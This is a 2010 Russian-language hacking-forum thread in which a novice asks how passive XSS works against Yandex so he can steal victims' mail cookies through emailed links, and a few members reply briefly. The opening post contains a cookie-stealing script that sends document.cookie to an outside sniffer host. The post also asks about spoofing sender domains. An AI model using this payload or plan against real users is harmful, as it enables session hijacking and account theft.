Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
05.05.2010, 02:16
|
|
Новичок
Регистрация: 09.03.2010
Сообщений: 17
Провел на форуме:
34021
Репутация:
0
|
|
XSS Yandex
Доброго времени суток.
Собственно первый раз в жизни решил занятся xss развлечениями.
ПРочитал статью xss для начинающих, остаось несколько вопросв которые хотелось задать сообществу.
Вобщем как я понимаю на яндексе искать активны хсс дело не благодарное, поэтому стоит использовать пассивные.
Собственно первый вопрос, правильно ли я понимаю значение смысла слова пассивные - я создаю скрипт перехвата кук
Код:
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
предварителньо запихнув его в какой либо фаил(упс.js)
Затем я делаю линк на этот скрипт, ну и как либо еш шифрую и пердаю жертве. Например почтой.
Теперь вопрос если жертва перейдет по линку я получу куки яндекса жертвы, или я неправильно понимаю смысл слова пассивные?
И еще вопрос, я так понимаю что в коде скрипта надо указать с сылку на снифер т.е. в место
Код:
"http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
надо написать
Код:
"http://мойсайт/путь до снифера/подставной указанный в снифере.gif?"+document.cookie;
</script>
Правильно ли я себе представляю работу пассивной xss уязвимости?
Нужно ли указывать гиф при добавлении кода в ifarame?
Хранятся ли пароли Яндекс почты в куках пусть даже в зашефрованном виде и можно ли их вскрыть? в смысле разгадать.
Можно ли добавить какую либо картинку в тело письма что бы получить подобный эффект, при условии что человек снимет ограничение на загрузку картинок?
И последний вопрос до сих пор осталось возможность отправлять письма с "подставных" доменов, т.е. например с того же вконтакта? |
|
|
05.05.2010, 04:36
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
1. Это активная.
2. На Яндексе паблик xss нету.
|
|
|
|
05.05.2010, 05:03
|
|
Новичок
Регистрация: 07.04.2007
Сообщений: 29
Провел на форуме:
457999
Репутация:
-8
|
|
3. Активные XSS - http://forum.antichat.ru/thread35802.html Правила читай на вверху же в топе закреплена тема с Хсс.
PS: Ничего сверх естественного ты не нашел - к сожалению ты вообще ничего не нашел.
|
|
|
|
05.05.2010, 09:56
|
|
Новичок
Регистрация: 09.03.2010
Сообщений: 17
Провел на форуме:
34021
Репутация:
0
|
|
Может я некорректно выразился, но я и не говорил что что либо нашел, я попробую перефразировать.
Я первы раз сталкиваюсь с хсс атакой.
Нашел тучи описаний об активных атаках, собственно вопрос, как выглядят пассивные атаки. т.е.
я так понимаю что если дать линк в письме на xss на другой сайт то кук яндекса мне невидать, правильно я понимаю?
Последний раз редактировалось ZeroCold; 05.05.2010 в 10:11..
|
|
|
|
05.05.2010, 13:08
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Пассивная XSS, это такая же XSS, как и активная, просто тебе нужно заставить юзера перейти по твоей ссылке с JS кодом и он точно так же выполниться
Последний раз редактировалось Redwood; 05.05.2010 в 14:04..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
